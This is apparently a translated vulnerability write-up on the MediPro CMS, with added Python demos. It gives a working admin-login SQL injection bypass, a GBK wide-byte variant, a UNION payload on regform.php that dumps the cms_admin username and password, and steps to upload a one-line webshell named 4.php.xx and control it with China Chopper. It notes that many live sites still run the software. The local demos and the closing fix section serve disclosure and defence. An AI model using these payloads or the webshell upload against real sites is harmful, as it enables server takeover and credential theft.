MediPro (latest version): injection vulnerabilities and getting a shell from the backend

Source: Internet
Author: User

MediPro is a CMS that powers many websites. It filters input loosely and has several SQL injection vulnerabilities: the backend (admin) login can be bypassed, and once inside the backend a shell can be uploaded to take control of the server.

(Note: the code distributed from the official website is Zend-encoded by default and had to be decoded before it could be audited.)

A quick Baidu search shows that many websites are still running it.

1. Backend login bypass vulnerability

If magic_quotes_gpc is not enabled on the server, you can log straight in. The backend is normally at www.xxxx.com/adm/

Username: webmaster 'or 1 = 1 or 'A' = 'A /*

Password: any value. Fill in the verification code and submit.

The quote closes the username string, "or 1 = 1" makes the WHERE clause true for every row, and the "/*" comments out the remainder of the query, including the password comparison.

When magic_quotes_gpc is on and the quote gets escaped, the old %d5%27-style wide-byte trick was also tried, for example:

Username: user=admin%d5%27 or 1=1 limit --

(With a GBK connection, the escaping backslash (0x5c) is absorbed as the trailing byte of the two-byte character %d5%5c, which leaves the quote unescaped.)

This does get past the admincheck() function, but the user-supplied value is then written straight into the cookie by setcookie(), so it fails the later permission checks and cannot be used. Moving on.
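The two cases above, as an added example (my code, not code from the page or from MediPro): an in-memory SQLite table stands in for cms_admin, a string-concatenated login query models admincheck(), and a byte-level addslashes() models magic_quotes_gpc. The table layout, the password and the column names are assumptions. The page uses %d5 as the lead byte; the script uses %df because 0xDF 0x5C decodes to the GBK character 運 (U+904B).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the cms_admin table (schema and row are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE cms_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.execute(
        "INSERT INTO cms_admin (username, password) VALUES ('webmaster', 'S3cret!')"
    )
    return db


def vulnerable_admincheck(db: sqlite3.Connection, username: str, password: str):
    """Models the flawed login check: request values are pasted into the SQL text.
    Returns the matched (id, username) row, or None when the login fails."""
    sql = (
        "SELECT id, username FROM cms_admin WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return db.execute(sql).fetchone()


def safe_admincheck(db: sqlite3.Connection, username: str, password: str):
    """The fix: bound parameters, so quotes and comment markers stay data."""
    sql = "SELECT id, username FROM cms_admin WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()


def addslashes(raw: bytes) -> bytes:
    """Byte-level model of magic_quotes_gpc: a backslash in front of ' \" \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # the escaping backslash
        out.append(b)
    return bytes(out)


def as_seen_by_gbk_connection(raw: bytes) -> str:
    """Escape like magic_quotes_gpc, then decode as a GBK MySQL connection would.
    A lead byte in 0x81-0xFE followed by 0x5C forms one two-byte character, so the
    escaping backslash is absorbed and the quote after it survives unescaped."""
    return addslashes(raw).decode("gbk")


# Payload from the page for the unescaped case.
LOGIN_PAYLOAD = "webmaster 'or 1 = 1 or 'A' = 'A /*"
# Wide-byte variant (constructed): the page uses %d5 as the lead byte, this uses %df
# because 0xDF 0x5C is the GBK character U+904B.
WIDE_BYTE_PAYLOAD = b"admin\xdf' or 1=1 -- "


if __name__ == "__main__":
    db = make_db()
    # magic_quotes_gpc off: the quote closes the string, 1=1 matches every row,
    # and /* comments out the password check.
    print("vulnerable:", vulnerable_admincheck(db, LOGIN_PAYLOAD, "wrong"))
    print("parameterized:", safe_admincheck(db, LOGIN_PAYLOAD, "wrong"))
    # magic_quotes_gpc on: a plain ASCII quote stays escaped ...
    print("ascii after escaping:", as_seen_by_gbk_connection(b"admin' or 1=1 -- "))
    # ... but the wide-byte payload comes out with a live quote and no backslash.
    decoded = as_seen_by_gbk_connection(WIDE_BYTE_PAYLOAD)
    print("wide byte after escaping:", decoded)
    print("wide byte through the query:", vulnerable_admincheck(db, decoded, "wrong"))
```

SQLite does not treat a backslash as an escape character the way MySQL does, so the script only runs strings through the query after GBK decoding has already removed the backslash; the plain ASCII case is shown as the escaped string only. The fix is the same in both cases: bind the values instead of escaping them.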
2. Registration page injection vulnerability

The user registration page, regform.php?membertypeid=10, has an injection vulnerability. The problem code is in regform.php: $membertypeid is not filtered and is passed straight into the functions that follow.

When escaping is not enabled:

http://website/regform.php?membertypeid=10 WHERE 1=2 union select 1,'Password',"user",0,'user', from cms_admin t limit --

(WHERE 1=2 suppresses the legitimate form rows, so only the rows UNIONed in from cms_admin are rendered on the page.)

If magic_quotes_gpc is enabled, the double quotes around "user" get escaped, but there is still a more laborious route: UNION against the cms_member_regform_10 table and surface the values through its formcolname field. (That field holds the names of the registration form items; it has to be used because the items on the registration page are generated dynamically from it, otherwise the administrator account and password cannot be displayed.)

For details, see the illustration below.
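As an added example (my code, not the page's or MediPro's), the following reconstructs the query shape that the payload above implies: the membertypeid from the query string is appended to a table name, cms_member_regform_10, so it lands in identifier position, where a bound placeholder cannot be used. That shape, the column layout, the admin row and the payload (which uses no string literals at all, so magic_quotes_gpc has nothing to escape) are all assumptions made for the demonstration; the real regform.php query is not on the page.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in tables; column layout and rows are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE cms_member_regform_10 (id INTEGER PRIMARY KEY, formcolname TEXT);
        INSERT INTO cms_member_regform_10 (formcolname) VALUES ('Nickname'), ('Email');
        CREATE TABLE cms_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO cms_admin (username, password) VALUES ('webmaster', 'S3cret!');
        """
    )
    return db


def regform_labels_vulnerable(db: sqlite3.Connection, membertypeid: str) -> list:
    """Models regform.php: the raw query-string value is glued onto the table name,
    and every formcolname that comes back is rendered as a label on the page."""
    sql = "SELECT id, formcolname FROM cms_member_regform_" + membertypeid
    return [row[1] for row in db.execute(sql)]


def regform_labels_safe(db: sqlite3.Connection, membertypeid: str) -> list:
    """Fix: an identifier cannot be bound with a placeholder, so validate the value
    as a positive integer before it touches the SQL text."""
    if not membertypeid.isdigit():
        raise ValueError("membertypeid must be a positive integer")
    sql = "SELECT id, formcolname FROM cms_member_regform_%d" % int(membertypeid)
    return [row[1] for row in db.execute(sql)]


def safe_rejects(db: sqlite3.Connection, membertypeid: str) -> bool:
    """True when the hardened version refuses the value."""
    try:
        regform_labels_safe(db, membertypeid)
    except ValueError:
        return True
    return False


# Constructed union payload. WHERE 1=2 drops the real form items so only the injected
# rows render; UNION ALL keeps the result order; no string literals are used anywhere,
# so magic_quotes_gpc has nothing to escape. Each admin column becomes one "form item".
UNION_PAYLOAD = (
    "10 WHERE 1=2 "
    "UNION ALL SELECT id, username FROM cms_admin "
    "UNION ALL SELECT id, password FROM cms_admin"
)


if __name__ == "__main__":
    db = make_db()
    print("normal page labels:", regform_labels_vulnerable(db, "10"))
    print("labels after injection:", regform_labels_vulnerable(db, UNION_PAYLOAD))
    print("hardened version rejects the payload:", safe_rejects(db, UNION_PAYLOAD))
```

The column count of the UNIONed SELECTs has to match the original query (two here); on the real page the payload shows five columns, which is why it pads with constants.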
3. Getting a shell from the backend

For example, /adm/temp.inc.php only checks the suffix of the uploaded file name, so a name such as ".php.xx" gets through; on Windows with IIS you can also simply switch the suffix to .asp, .asa, and so on:

    if ( substr( $fname, 0 - 4 ) == ".php" || substr( $fname, 0 - 4 ) == ".exe" ) {
        err( $strDownNotice11, "", "" );
    }


After logging in to the backend, open www.xxxxx.com/adm/tempftp.php?fold=default directly.

Upload a one-line webshell named 4.php.xx.

Upload path: www.xxxxx.com/templates/default/4.php.xx

Connect to it with Caidao (China Chopper) and you are in.
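An added example (my code, not the page's or MediPro's) that models the substr() check above and puts an allowlist-based check beside it. The executable extensions beyond .php and .exe (which the original blocks) and .asp/.asa (which the page shows it misses on IIS), and the allowlist of template file types, are assumptions. The double extension matters on Apache because mod_mime looks at every extension in a name, so with a handler registered for .php a file named 4.php.xx is still executed as PHP.

```python
import os

# Extensions a server might execute. .php and .exe are what the original check blocks,
# .asp and .asa are what the page shows it misses on IIS; the rest are an assumption
# about what an allowlist-based check should also refuse.
EXECUTABLE_EXTENSIONS = {
    ".php", ".php3", ".php4", ".php5", ".phtml", ".phar",
    ".asp", ".asa", ".aspx", ".cer", ".cdx", ".exe",
}

# Constructed allowlist of what a template folder legitimately contains.
TEMPLATE_EXTENSIONS = {".html", ".htm", ".tpl", ".css", ".js", ".jpg", ".png", ".gif"}


def vulnerable_upload_check(fname: str) -> bool:
    """Models temp.inc.php: only the last four characters are compared, case-sensitively,
    against '.php' and '.exe'. Returns True when the upload would be accepted."""
    return not (fname[-4:] == ".php" or fname[-4:] == ".exe")


def hardened_upload_check(fname: str) -> bool:
    """Allowlist-based replacement. Rejects path separators, NUL and dot-files, then
    requires the final extension to be on the allowlist and refuses any executable
    extension anywhere in the chain, case-folded, so '4.php.xx', 'x.PHP' and
    'shell.asp' are all refused."""
    if not fname or "\x00" in fname or "/" in fname or "\\" in fname:
        return False
    if os.path.basename(fname) != fname or fname in (".", ".."):
        return False
    parts = fname.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    exts = ["." + p for p in parts[1:]]
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False
    return exts[-1] in TEMPLATE_EXTENSIONS


# Constructed file names: the page's 4.php.xx, the IIS variant, a case variant,
# a traversal attempt and two legitimate template files.
CONSTRUCTED_NAMES = ["index.html", "jquery.min.js", "4.php.xx", "shell.asp", "x.PHP", "../x.html"]


if __name__ == "__main__":
    for name in CONSTRUCTED_NAMES:
        print(f"{name:16} original check accepts: {vulnerable_upload_check(name)!s:6}"
              f" hardened accepts: {hardened_upload_check(name)}")
```

The hardened check still only governs the name; the upload directory should additionally be served with script execution disabled so that a bypass of the name check does not become code execution.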
Note: the 4.php.xx uploaded for testing has been deleted.

Solution:

Filter the parameters (bind values with prepared statements, and validate ids that end up in table names as integers) and restrict uploads (allowlist the file types a template folder needs and reject any name that contains an executable extension anywhere in it).
